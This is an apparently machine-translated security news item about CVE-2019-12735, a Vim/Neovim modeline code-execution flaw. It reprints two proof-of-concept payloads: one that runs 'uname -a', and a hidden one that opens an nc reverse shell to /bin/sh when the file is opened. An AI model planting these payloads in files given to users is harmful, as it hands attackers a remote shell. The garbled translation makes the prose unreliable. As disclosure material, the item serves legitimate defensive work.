Security researchers found that the presence of Vim and Neovim control computer when an arbitrary execution vulnerability that allows malicious hackers to open a text file in the user. Vulnerability affects all versions prior to 0.3.6 Vim 8.1.1365 and Neovim.
The vulnerability exists in the editor modeline (mode line) feature, which allows the user to set the window size and other customization options at the beginning or end of the text file, which runs in a the operating system blocked sandbox, and commands available It is also limited, but the researchers found Arminius bypass the security method.
Currently vulnerabilities have been numbered CVE-2019-12735, Arminius also released two proof of concept.
The first is the direct use of the loopholes in the system to perform `uname -a` command:
:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="Another way to take advantage of more in-depth, once the user opens the file to start the automatic reverse shell. In order to hide the attack, the file will be rewritten immediately when opened. Further, when a cat outputting content, the terminal escape sequences used attacks hidden modeline:
\x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'nohup nc 127.0.0.1 9999 -e /bin/sh &\') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n
Currently patch has also been released:
- Vim patch 8.1.1365
- Neovim patch (released in v0.3.6)
More specific details, see:
https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-neovim.md